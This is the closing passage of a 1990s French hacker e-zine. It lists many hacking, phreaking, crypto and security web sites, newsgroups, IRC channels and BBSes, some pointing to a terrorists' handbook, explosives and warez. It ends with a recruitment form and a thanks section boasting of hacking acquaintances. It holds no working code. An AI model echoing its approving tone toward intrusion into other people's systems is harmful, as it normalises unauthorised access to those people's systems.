obscura.com/~loki/ (Cryptology) ophie.hughes.american.edu/~ophie (Ophie) oregano.sl.pitt.edu/index.htm outpost.callnet.com/outpost.html pages.ripco.com:8080/~glr/glr.html (Full Disclosure) peg.pegasus.oz.au (EFF Australia) quetel.qc.ca/qt0000ag.htm (Quebec-Telephone) resudox.net/bio/mainpage.html (BioHazard's Home Page) ripco.com:8080/~glr/glr.html (Full Disclosure) rschp2.anu.edu.au:8080/crypt.html scitsc.wlv.ac.uk/~cs6171/hack (UNIX Security) seclab.cs.ucdavis.edu/Security.html (Security) seclab.cs.ucdavis.edu/slides/slides.html (Security Lab Slides) sfpg.gcomm.com/mitnick/mitnick.htm (3wP Kevin Mitnick WWW HomePage) smurfland.cit.buffalo.edu/NetMan/index.html (Network Management) sunsite.unc.edu/sun/inform/sun-info.html (Sun Microsystems Sponsor Page) support.mayfield.hp.com (Hewlett Packard SupportLine Services) tamsun.tamu.edu/~clm3840/hacking.html (Hacking/Phreaking) the-tech.mit.edu (LaMacchia case info) town.hall.org/university/security/stoll/cliff.html (Cliff Stoll) turnpike.net/emporium/C/celestial/celest.html (Detective Databases 1995) ucs.orst.edu:8001/mintro.html (Micro Power Broadcasting) underground.org (Eubercrackers) unixg.ubc.ca:780/~jyee/ (Cell) w3.gti.net/safety web.mit.edu/network/pgp.html (Getting PGP) web.nec.com/products/necam/mrd/cellphones/index.html (NEC) weber.u.washington.edu/~phantom/cpunk/index.html (Cryptology) wildsau.idv.uni-linz.ac.at/~klon/underground/underground.html (Klon's Underground Links) wintermute.itd.nrl.navy.mil/5544.html (Network Security) www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html www-ns.rutgers.edu/www-security/index.html (Rutger's documents on WWW security) www-personal.engin.umich.edu/~jgotts/underground/boxes.html (Box info) www-swiss.ai.mit.edu/~bal/pks-toplev.html (Findingsomeone's PGP key) www.2600.com (2600 Magazine) www.8lgm.org (8lgm Security Advisories) www.aads.net (Ameritech) www.access.gpo.gov/su_docs/ www.aloha.com/~seanw/index.html www.alw.nih.gov/WWW/security.html (Unix Security) www.artcom.de/CCC/hotlist.html (Chaos Computer Club Hotlist) www.artech-house.com/artech.html (Artech House) www.asg.unb.ca (Atlantic Systems Group Mosaic Index) www.aspentec.com/~frzmtdb/fun/hacker.html www.aston.ac.uk/~bromejt/mobile.html (Mobile Phone Service Locator) www.att.com (ATT) www.auditel.com (Auditel) www.auscert.org.au (Australian CERT) www.axent.com/axent (Axent Technologies) www.ba.com (Bell Atlantic) www.bctel.com (BC Tel) www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html (X-Win) www.bell.ca (Bell Canada) www.bell.com (MFJ Task Force) www.bellcore.com/SECURITY/security.html(Bellcore Security Products) www.border.com (Border Network Technologies) www.brad.ac.uk/~nasmith/index.html www.brad.ac.uk/~nasmith/underground.html (Undergound WWW Sites) www.bst.bls.com (BellSouth) www.bt.co.uk (British Telecom) www.business.co.uk/cellnet (Cellnet) www.c2.org:80/remail/by-www.html (WWW-based remailing form) www.c3.lanl.gov/~mcn (Lanl) www.cam.org/~gagnon (OCP's) www.careermosaic.com/cm/uswest (USWest) www.castle.net/~kobrien/telecom.html (Telecom) www.cco.caltech.edu/~rknop/amiga_pgp26.html www.cdt.org/cda.html www.cec.wustl.edu/~dmm2/egs/egs.html (En Garde Systems) www.cert.dfn.de/ (German First Team) www.checkpoint.com (Checkpoint) www.chem.surrey.ac.uk/~ch11mh/secure.html (Another page on secure WWW server setup) www.chez.com/norace/ (NoRace : groupe de phreak) www.chez.com/palm/ Page du hackeur Palm www.cis.ksu.edu/~psiber/fortress/phreak/ph2reak.html (Are You Some Kind Of PHREAK!) www.cis.ohio-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html www.cityscape.co.uk/users/ek80/index.html (Inside Cable Cover) www.cohesive.com (Cohesive Systems) www.commerce.net/information/standards/drafts/shttp.txt (HyperText) www.con.wesleyan.edu/~triemer/network/docservs.html www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html www.cosc.georgetown.edu/~denning/crypto (The Cryptography Project) www.cost.se (COST Computer Security Technologies) www.cpsr.org/home (CPSR) www.crimson.com/isdn/telecomacry.txt (Crimson's Telecommunications Acronyms) www.crtc.gc.ca (CRTC - Canadian regulator) www.cs.berkeley.edu/~raph/remailer-list.html (Anon remailer list) www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (CMU Security) www.cs.purdue.edu/coast/coast.html (Coast) www.cs.purdue.edu/pcert/pcert.html (PCERT) www.cs.tu-bs.de (Network management Tools) www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk) www.cs.umd.edu/~lgas (Laughing Gas) www.cs.umd.edu/~lgas/haquerwerld/haquer-individuals.html (Haquerwerld) www.csd.harris.com/secure_info.html (Harris) www.csl.sri.com (SRI Computer Science Lab) www.csua.berekeley.edu/pub/cypherpunks/Home.html (Cryptology) www.cwi.nl/cwi/people/Jack.Jansen/spunk/cookbook.html www.cyber.co.uk/~joyrex (Joyrex Cellular) www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe) www.cygnus.com/~gnu/export.html (Cryptography Export Control Archives) www.datafellows.fi (Data Fellows (F-Prot) www.datasync.com/~sotmesc/sotmesc.html (SotMESC) www.dcs.exeter.ac.uk/~aba (Cypherpunk) www.dct.ac.uk/~misb3cp/2600/faq.txt www.demon.co.uk/mobiles (C.C.Mobiles) www.dhp.com (DataHaven Project) www.dhp.com/~pluvius (Pluvius' Home Page) www.digicash.com/ecash/ecash-home.html (Ecash Home Page) www.digital.com/info/key-secure-index.html (Digital Secure Systems) www.dnai.com/~gui/index.html www.dtic.dla.mil/defenselink (Office of the U.S. Secretary of Defense (OSD) www.dtic.dla.mil/iac (DoD Information Analysis Center (IAC) Hub Page) www.eecs.nwu.edu/~jmyers/bugtraq/about.html www.eecs.nwu.edu/~jmyers/bugtraq/archives.html www.eecs.nwu.edu/~jmyers/bugtraq/index.html (Bugtraq) www.eecs.nwu.edu/~jmyers/ids/index.html(Intrusion Detection Systems) www.eff.org www.eff.org/pub/Alerts www.eff.org/pub/Net_info/Tools/Crypto/ www.emap.co.uk/partners/racal-airtech (Racal-Airtech) www.ensta.fr/internet/unix/sys_admin (System administration) www.epic.org www.ericsson.nl (Ericsson) www.etext.org/Zines/ (Zines) www.farmstead.com (Farmstead) www.fbi.gov/fbi/FBI_homepage.html (FBI Homepage) www.fc.net/defcon (DefCon) www.fedworld.gov (Federal Government) www.first.org/first/ (FIRST) www.fonorola.net (Fonorola (a Canadian carrier) www.frhack.org Groupe de frhack www.frus.com (Firewalls R Us) www.gbnet.net/kbridge (KarlBridge) www.getnet.com/crak (CRAK Software) www.getnet.com/~vision www.gold.net/users/cw78 (FleXtel) www.greatcircle.com (Great Circle Associates) www.gsu.edu/~socrerx/catalog.html www.gta.com/index.html (Global Technology Associates) www.gti.net/grayarea (Gray Areas) www.hotwired.com (Wired Magazine) www.hpcc.gov/blue94/section.4.6.html (NSA) www.hq2.telecom.ie (Telecom Eireann) www.iacr.org/~iacr (International Association of Cryptologic Research (IACR) www.ibmpcug.co.uk/~Vidtron (Videotron) www.ic.gov (Central Intelligence Agency Home Page) www.ifi.uio.no/~staalesc/PGP/home.html www.iia.org/~gautier/me.html (Rich Gautier's Home Page) www.indirect.com/www/evildawg www.indirect.com/www/johnk/ (CRAK Software) www.ingress.com (Ingress Communications) www.interaccess.com/trc/tsa.html www.io.org/~djcl/phoneb.html www.iquest.net/~oseidler (Oliver Seidler's WWW Page) www.itd.nrl.navy.mil/ITD/5540 (NRL Center for High Assurance Computer Systems) www.itu.ch/TELECOM (Telecom '95) www.jagunet.com/~john/ www.jedefense.com/jed.html (Journal of Electronic Defense) www.l0pht.com/cdc.html (Cult of the Dead Cow) www.l0pht.com/radiophone (Radiophone Archive) www.l0pht.com/~oblivion/IIRG.html (International Information Retrieval Guild Archive Site) www.lat.com (Los Altos Technologies) www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security) www.lib.iup.edu/~seaman/hack/bone.html (Bone's H/P/C page o' rama) www.links.net www.linux-france.com Linux France www.linux.sos-informatique.com Un autre site Linux en francais www.linux-kheops.com/ Kheops www.louisville.edu/~wrbake01 (The GodZ of CyberSpacE) www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide) www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook) www.magi.com/~vektor/linenoiz.html www.mastercard.com (Secure Electronic Payment Protocol) www.mcs.com/~candyman/http/radio.html (Radar) www.mcs.com/~candyman/under.html (Cell) www.mcs.net/~candyman (H/P) www.mgmua.com/hackers/index.html (Hackers, the movie) www.micronet.fr/~darcelf/ Le hacking en france www.milkyway.com (Milkyway Networks Corporation) www.mit.edu:8001/people/warlord/pgp-faq.html (PGP 2.6.2 FAQ, Buglist, Fixes, and Improvements) www.monmouth.com/~jshahom (The Insomniac's Home Page) www.mot.com (Motorola) www.mpr.ca/ (MPR Teltech Ltd) www.msen.com/~emv/tubed/spoofing.html (Info on IP spoofing attacks) www.mwjournal.com/mwj.html (Microwave Journal) www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/security.html (Security in Mosaic) www.ncsl.nist.gov (NIST Computer Systems Laboratory) www.net23.com (Max Headroom) www.netpart.com (NetPartners) www.netresponse.com:80/zldf/ www.nic.surfnet.nl/surfnet/security/cert-nl.html (CERT-NL) www.nist.gov (NIST) www.nokia.com (Nokia) www.nortel.com (Northern Telecom) www.ntt.jp (Nippon Telephone) www.nynex.co.uk/nynex (NYNEX) www.odci.gov (The CIA) www.one2one.co.uk (Mercury One-2-One) www.open.gov.uk/oftel/oftelwww/oftelhm.htm (OFTEL's Home Page) www.openmarket.com/info/cryptography/applied_cryptography.html www.pacbell.com (Pacific Bell) www.panix.com/vtw www.paranoia.com/astrostar/fringe.html www.paranoia.com/hpa (Paranoia's H/P/A Links) www.paranoia.com/mthreat (ToneLoc) www.paranoia.com/~coldfire (Cold Fire's Web Page) www.paranoia.com/~darkfox (Darkfox's Home Page) www.paranoia.com/~ice9 (Ice-9's Home Page) www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP) www.phantom.com/~darkcyde (DarkCyde) www.phantom.com/~king (Randy King's WWW Page) www.phillips.com (Phillips Electronics) www.phred.org (The Phred Networking Organization) www.pic.net/uniloc/starlink (Starlink) www.planet.net/onkeld (BlueBeep Home Page) www.primenet.com/~kludge/haqr.html (Kludge) www.quadralay.com/www/Crypt/Crypt.html (Quadralay Cryptography) www.qualcomm.com/cdma/wireless.html (Qualcomm CDMA) www.ramp.com/~lcs/winpgp.html (PGP with MS/Win) www.raptor.com (Raptor) www.raptor.com/raptor/raptor.html (Raptor Network Isolator) www.research.att.com (AT&T) www.respublica.fr/underground-angels/index.htm (The Underground Angels) www.rocksoft.com/~ross (Rocksoft Pty (Veracity) www.rogers.com (Rogers Communications) www.rsa.com (RSA Data Security) www.sasknet.sk.ca/Pages/sktlhome.html (SaskTel) www.satelnet.org/~ccappuc www.sccsi.com/lsli/lsli.homepage.html (PORTUS) www.sctc.com (Secure Computing Corporation) www.seas.upenn.edu/~rourkem (FakeMail FAQ) www.seduction.com www.sei.cmu.edu/SEI/programs/cert.html (CERT Coordination Center) www.service.com/cm/uswest/usw1.html (USWest) www.shore.net/~eskwired/hp.html www.soci.niu.edu/~cudigest www.somar.com (Somar Software) www.soscorp.com (Sources of Supply Corp) www.spatz.com/pecos/index.html (The World of Hacking) www.spy.org (Computer Systems Consulting) www.spy.org (spy.org) www.sri.com (SRI) www.stentor.ca (Stentor (Canadian telcos) www.tecc.co.uk/public/uk-telecom/btns.html (BT "star services") www.telecoms-mag.com/tcs.html (Telecommunications Magazine) www.telkom.co.za (Telkom S.A. Ltd) www.telstra.com.au/info/security.html (Security Reference Index) www.teresa.com www.tezcat.com/web/security/security_top_level.html www.tiac.net/users/triad/philes/jokai.html (Jokai Reservation for the Preservation of the 1st Amendment) www.ticllc.net/~scrtnizr www.tis.com (Trusted Information Systems) www.trcone.com/t_crookb.html (CrookBook) www.tregistry.com/ttr (Telecomunications Training Courses) www.tri.sbc.com (Southwestern Bell) www.tricon.net/Comm/synapse (Synapse Magazine) www.tufts.edu/~jpagano/ www.uccs.edu/~abusby/hpawebsites.html www.uccs.edu/~abusby/k0p.html (kn0wledge phreak) www.uci.agh.edu.pl/pub/security (Security) www.uknet.net/pnc (The Personal Number Company) www.umcc.umich.edu/~doug/virus-faq.html (Virus) www.underground.org (underground.org) www.underground.org/bugs/ www.usfca.edu/crackdown/crack.html (Hacker Crackdown) www.vodafone.co.uk (Vodafone) www.vptt.ch/natel.html (Natel) www.wam.umd.edu/~ankh/public/devil_does_unix www.warwick.ac.uk/WWW/search/Phones/nng.html (National Number Group Codes) www.well.com/user/abacard www.well.com/user/crunch (Captain Crunch) www.wfu.edu/~wilsonbd www.wiltel.com (Wiltel) www.wiltel.com/glossary/glossary.html (Telecommunications Glossary) www.wired.com (HotWired) www2.undernet.org:8080/~cs93jtl/IRC.html (IRC) --------------------------------------------------------------------- IRC #2600 #hack #hacker #hacking #phreak #phreaker #phreaking #warez #linux #cellular #Unix #hack.fr #hacking.fr #hacker.fr #francehack --------------------------------------------------------------------- newsgroups alt.2600 Do it 'til it hertz alt.2600hz alt.2600.codez alt.2600.debate alt.2600.moderated alt.cellular alt.cellular-phone-tech Brilliant telephony mind blow netnews naming alt.comp.virus An unmoderated forum for discussing viruses alt.comp.virus.source.code alt.cracks Heavy toolbelt wearers of the world, unite alt.cyberpunk High-tech low-life. alt.cyberspace Cyberspace and how it should work. alt.dcom.telecom Discussion of telecommunications technology alt.engr.explosives [no description available] alt.fan.kevin-mitnick alt.fan.lewiz Lewis De Payne fan club alt.hackers Descriptions of projects currently under development alt.hackintosh alt.locksmithing You locked your keys in *where*? alt.hackers.malicious The really bad guys - don't take candy from them alt.ph.uk United Kingdom version of alt.2600 alt.privacy.anon-server Tech. & policy matters of anonymous contact servers alt.radio.pirate Hide the gear, here comes the magic station-wagons. alt.radio.scanner Discussion of scanning radio receivers. alt.satellite.tv.europe All about European satellite tv alt.security Security issues on computer systems alt.security.index Pointers to good stuff in misc.security (Moderated) alt.security.keydist Exchange of keys for public key encryption systems alt.security.pgp The Pretty Good Privacy package alt.security.ripem A secure email system illegal to export from the US comp.dcom.cellular [no description available] comp.dcom.telecom Telecommunications digest (Moderated) comp.dcom.telecom.tech [no description available] comp.org.cpsr.announce Computer Professionals for Social Responsibility comp.org.cpsr.talk Issues of computing and social responsibility comp.org.eff.news News from the Electronic Frontiers Foundation comp.org.eff.talk Discussion of EFF goals, strategies, etc. comp.os.netware.security Netware Security issues comp.protocols.kerberos The Kerberos authentification server comp.protocols.tcp-ip TCP and IP network protocols comp.risks Risks to the public from computers & users comp.security.announce Announcements from the CERT about security comp.security.firewalls Anything pertaining to network firewall security comp.security.misc Security issues of computers and networks comp.security.unix Discussion of Unix security comp.virus Computer viruses & security (Moderated) de.org.ccc Mitteilungen des CCC e.V. misc.security Security in general, not just computers (Moderated) rec.pyrotechnics Fireworks, rocketry, safety, & other topics rec.radio.scanner [no description available] rec.video.cable-tv Technical and regulatory issues of cable television sci.crypt Different methods of data en/decryption --------------------------------------------------------------------- telnet anarchy-online.com ntiabbs.ntia.doc.gov (NTIA) l0pht.com (The L0pht) sfpg.gcomm.com (The Floating Pancreas) telnet lust.isca.uiowa.edu 2600 (underground bbs) (temporarily down) pcspm2.dar.csiro.au (Virtual Doughnutland BBS) prince.carleton.ca 31337 (Twilight of The Idols) spy.org (Computer Systems Consulting) --------------------------------------------------------------------- gopher ba.com (Bell Atlantic) cell-relay.indiana.edu (Cell Relay Retreat) csrc.ncsl.nist.gov (NIST Security Gopher) gopher.acm.org (SIGSAC (Security, Audit & Control)) gopher.cpsr.org (Computer Professionals for Social Responsibility) gopher.eff.org (Electonic Frontier Foundation) gopher.panix.com (Panix) gw.PacBell.com (Pacific Bell) iitf.doc.gov (NITA -- IITF) info.itu.ch (International Telegraph Union) ncjrs.aspensys.com (National Criminal Justice Reference Service) oss.net (Open Source Solutions) spy.org (Computer Systems Consulting) wiretap.spies.com (Wiretap) --------------------------------------------------------------------- J'attends vos adresses pour les rajouter à cette liste et si il y un site qui n'est pas correct, signalez le moi. ===================================================================== Voilà, ce numéro 1 se termine. J'espère que ça vous a plu. Je vous attends, vous hackers pour rejoindre notre groupe et pour remettre de l'ordre ds tout ce bordel. Venez vous inscrire sur http://www.respublica.fr/underground-angels/ ou remplissez ce questionnaire et envoyez le moi à White_Angel_TUA@HOTMAIL.COM ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Nom: Prénom: Age: Sexe: E-Mail: Adresse site web: Langue(s) parlée(s): Pays: Surnom que vous voulez prendre au sein du groupe: Ce que vous voulez faire dans le groupe: - - - - - - Vos suggestions: - - - - - - - - - +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Je vous attends nombreux...N'hésitez pas, nous acceptons tout le monde (Jeune, vieux, homme , femme , débutant , professionnel...) SAUF LES TETES BRULEE!!!! ===================================================================== Remerciements ===================================================================== Je remercie toutes les personnes suivantes: -The Saint qui n'a pas hésité à me suivre dans cette aventure. -Mes pôtes de 1ère S -Mon père et ma mère -Mon chat -Mes profs qui me donnent tellement de boulot que je ne m'ennuie plus.... -Mr P. Qui ferme les yeux quand on hacke. -Tout les abrutis que je connais et sur lesquels je m'entraîne (voir plus bas). -PC Team, Dream, Pirate mag et le Virus Informatique. -Tout ceux qui me lisent (vous) -Merci à tout ceux de la scène underground francophone (Noway, Noroute, FrHack, et j'en oublie.....) Je ne remercie pas les personnes suivantes: -France Télécon -Microsoft (Bill Getz) -Compaq -Mr B. qui ne connait rien à la vie -Tout ceux qui font leur pros et qui n'y connaissent rien (voir plus haut). -Et j'en oublis un bon paquet ===================================================================== A LA PROCHAINE !!! (J'éspère...) ===================================================================== ___________ ____ ______/ \__// \__/____\ _/ \_/ : //____\\ /| : : .. / \ | | :: :: \ / | | :| || \ \______/ | | || || |\ / | \| || || | / | \ | || || | / /_\ \ | ___ || ___ || | / / \ \_-_/ \_-_/ | ____ |/__/ \ _\_--_/ \ / /____ / / \ / \______\_________/ BOUGE TOI !!!!!! That's all HTTP://WWW.RESPUBLICA.FR/UNDERGROUND-ANGELS/INDEX.HTML White Angel: White_Angel_TUA@Hotmail.com